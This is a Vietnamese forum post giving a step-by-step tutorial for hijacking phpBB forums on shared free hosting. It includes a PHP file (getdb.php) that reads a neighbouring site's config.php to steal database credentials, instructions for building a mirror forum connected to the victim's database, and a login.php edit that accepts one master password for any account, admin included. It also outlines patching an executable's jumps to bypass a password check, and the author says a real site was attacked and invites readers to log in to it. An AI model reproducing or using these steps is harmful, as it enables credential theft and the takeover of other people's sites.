funnyclub

funnyclub
 
IndexPortalCalendarTrợ giúpTìm kiếmThành viênNhómĐăng kýĐăng Nhập

Share | 
 

 Hack 4rum!

Xem chủ đề cũ hơn Xem chủ đề mới hơn Go down 
Tác giảThông điệp
rain_admin
leader
leader
avatar

Tổng số bài gửi : 176
Join date : 28/10/2010

Bài gửiTiêu đề: Hack 4rum!    Mon Jan 10, 2011 9:01 pm

Hack LocalSite :


Một cách để hack được một số Web Portal hoặc forum của hầu hết các free
hosting như lycos.co.uk vv. Và tỉ lệ thành công là 100% tuy hơi mất
thời gian
Trước hết cách này gần như kiểu hack qua Local Exploit để lấy Root's
passwd, cái này chắc nhiều bạn cũng đã biết nhưng cũng khác chút ít. Vì
vậy tôi cũng chỉ xin lấy một ví dụ là hack phpBB forum để làm mẫu chung
cho các kiểu Portal hay forum khác.

Bước 1. Xác định URL website cần hack.
Do đây là free hosting nên website luôn có dạng http://www28.websamba.com/root/yoursite
Và giả sử forum phpBB nằm tại URL sau http://www28.websamba.com/root/victi...th/default.htm
Chú ý là phải tìm đúng URL Root chứ không phải redirect hay forward ..

Bước 2. Đăng kí một hosting cùng trên server đó.
Vì đây là free hosting nên nếu victim đăng kí được thì bạn cũng có thể đăng kí dễ dàng
Giả sử bạn đăng kí một hosting như sau http://www28.websamba.com/root/mysite/default.htm

Bước 3. Xác định DB info của Victim
Điều này rất dơn giản khi bạn với victim đang cùng trên một Local
Thật vậy có thể là /home/user_root/public_html/mysite/ hay
/home/user_root/httpdocs/mysite/ tuỳ thuộc Control Panel của Server là
lọai gì (Cpanel, Plesk, Enxim..). Nhưng điều này không cần chú ý.

3.1 Bạn tạo một file để lấy DB info của victim như sau
## getdb.php begin
<?php
$fd = fopen ("../victim/phpBB_path/config.php", "r");
while (!feof ($fd)) {
$line = fgets($fd,4000);
print $line;
}
fclose ($fd);
?>
## getdb.php end
Bạn có thể thay $fd bằng đường dẫn tới bất kì file php mà bạn muốn xem
mã nguồn của nó. Vì đối với các loại Portal hoặc forum khác có thể DB
Info không chứa trong file config.php như của phpBB
3.2 Upload file getdb.php
Bạn chỉ việc upload lên hosting mà bạn vừa đăng kí http://www28.websamba.com/root/mysite/getdb.php
3.3 Lấy DB info của victim
Chạy file getdb.php vừa rồi trên Browser của bạn. Bạn sẽ thấy một màn
hình trắng (blank). Đừng lo, bạn hãy "View source" và bạn sẽ thấy được
các thông tin như sau
## getdb.php's source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## getdb.php's source end
Xong bước thứ 3

Bước 4. Kiểm tra mật khẩu mà bạn vừa lấy được.
Với nick Admin trong forum và tất cả những gì có thể liên quan như
passwd e-mail, hosting, domain .. Vì có thể nạn nhân dùng 1 passwd cho
tất cả những mật khẩu của mình cho đỡ quên. Đây là một trong những thói
quen chết người
Nếu mà thành công thì dừng tại đây nếu không hãy sang bước thứ 5

Bước 5. Tạo một mirror phpBB forum.
5.1 Nghĩa là sao ? bạn hãy upload một phpBB forum cùng phiên bản với victim vào hosting của bạn http://www28.websamba.com/root/mysite/default.htm
Và đừng Install forum này nếu bạn muốn hack nó.
5.2 Config forum vừa upload
Bạn hãy config cho forum của bạn thực sự là một mirror của victim's forum.
Điều đó có nghĩa là bạn phải link DB đến DB của victim, điều đó thật dễ dàng khi bạn đã có được DB info của victim trong tay.
5.2.1 Tạo file config.php
Đó là toàn bộ những gì bạn vừa "view source" được
## config.php source begin
<?php
//
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Bạn upload đè lên file config.php trong cái forum mới toanh mà bạn vừa upload.
http://www28.websamba.com/root/mysite/config.php
5.2.3 Thử lại
Bạn thử gõ http://www28.websamba.com/root/mysite/default.htm xem, nếu mà forum của bạn có các thông số y hệt như của http://www28.websamba.com/root/victim/phpBB_path tức là bạn đã thành công bước này

Bước 6. Sửa mã nguồn Mirror Site
Mục đích bước này là bạn sẽ sửa mã nguồn forum của bạn đề bạn có thể
Login vào được Admin panel của nó. Nếu bạn học PHP thì việc này khá dễ
dàng.
Tôi xin nêu ra 1 phương pháp, đó là cách crack cổ điển.
6.1 Crack cổ điển
6.1.1
Đó là khi bạn muốn crack passwd 1 file exe, bạn có thể deassebler nó ra thành file.asm bằng nhiều chương trình hiện nay
6.1.2
Tìm các lệnh nhảy có điều kiện (JP gì gì đó. Cái này có hàng đống mà). của đoạn code dòi mật khẩu
6.1.3
Sửa thành lệnh nhảy không điều kiên
6.1.4
Compile lại thành file exe và OK. Ta nhập bất cứ mật khẩu nào vào nó cũng chấp nhận
6.2 Sửa mã nguồn
Sửa ở file login.php và sẽ cho phép bạn Login dưới mọi nickname bằng 1 passwd chọn sẵn
6.2.1 Chọn mật khẩu chung cho toàn bộ các nick.
Thực sự các mật khẩu trong phpBB đã được mà hoá theo kiểu MD5, do đó có
thể rất khó khăn để có thể giải mã nó. Nếu các bạn hiểu rõ về kiêu
encode này thì các bạn có thể tự tìm cho mình mật khẩu thích hợp, nếu
không các bạn có thể sử dụng mật khẩu đã được tôi giải mã là:
"hainam@hainam.org"
Cái địa chỉ mail của tôi ấy mà, khi mật khẩu này được mã hoá theo MD5
nó sẽ là một mật khẩu như sau "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Thiết lập mật khẩu chung cho toàn bộ các nick
Trước hết bạn mở file login.php ra tìm đoạn sau
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Chèn thêm biến $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
Tức là sửa đoanj mã đó thành
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Tiếp đó tìm đoạn mã sau
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Sửa đoạn mã đó thành
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Ghi lại file login.php
Bước 7.Login User với mật khẩu đã chọn
Bây giờ bạn có thể login vào diễn đàn qua website của bạn http://www28.websamba.com/root/mysite/login.php
với bất cứ nickname nào bằng mật khẩu mà bạn đã chọn. Ở đây là
"hainam@hainam.org" kể cả là nick Admin, và vào được Admin Panel ..
Chú ý rằng ở website của bạn thì User chỉ có thể login với mật khẩu là hainam@hainam.org chứ không thể bằng bât kì mật khẩu khác kể cả đó là mật khẩu đúng
Tổng quát
I/Phương Pháp
-Đây là một ví dụ cho việc hack các website khi trong một local, không
chỉ riêng đối với phpBB mà có thể áp dụng được cho nhiều Portal hay
forum khác, tuy nhiên để có thể hack được từng loại bạn đều phải hiểu
rất kĩ về nó và tránh lạm dụng quá đáng.
-Cách hack này tuy mất nhiều thời gian trong việc upload một mirror
nhưng rất hiệu quả. Tuy nhiên tuyệt đối không nên sử dụng chúng lung
tung và bừa bãi.
-Các hosting cho phép free, điều đó chứng tỏ họ rất tốt bụng, cũng
chính vì vậy cũng không nên sử dụng phương pháp này khi KHÔNG THỰC SỰ
cần thiết
II/Ví dụ.
-Trước hết tôi xin lỗi những ai đã làm website **** vì tôi sẽ đưa
website của các bạn ra làm ví dụ và đã là victim đầu tiên của tôi.
-Mong các bạn, những người đang muốn học hỏi thêm một chút kinh nghiệm
chỉ tham qua chứ không lạm dụng gi để làm hỏng DataBase của họ, thực sự
tôi đã backup nhưng tôi cũng rất ngại restore lại. Hơn nữa để đảm bảo
cho các bài viết tiếp theo không bị phản đối, tôi mong mọi người hãy
tôn trọng ý kiến của tôi, KHÔNG PHÁ PHÁCH GÌ DB CỦA VICTIM và mang mục
đích học hỏi và tham khảo lên hang đầu.
-Website mirror của website**** là **** , tại đây các bạn có thể login
vào bất cứ nickname nào trong diễn đàn **** với mật khẩu chung là
"hainam@hainam.org" . hãy nhớ là KHÔNG NÊN PHÁ DB CỦA HỌ, chi nên tham
khảo.
Về Đầu Trang Go down
Xem lý lịch thành viên http://funnyclub.forumvi.com
 
Hack 4rum!
Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Gửi tới các AD, BQT ,SM, M...và các thành viên 4rum.
» hướng dẫn kiếm tiền trên mạng cho ea 4rum mua đầu thu(cực dzễ)
» mong anh em 4rum giúp đỡ bệnh lạ trên đầu thu humax không HD
» các bác trên 4rum có biết loại đầu thu T2 này ko???

Permissions in this forum:Bạn không có quyền trả lời bài viết
funnyclub :: Khoa học & Công nghệ :: Thủ thuật Internet-
Chuyển đến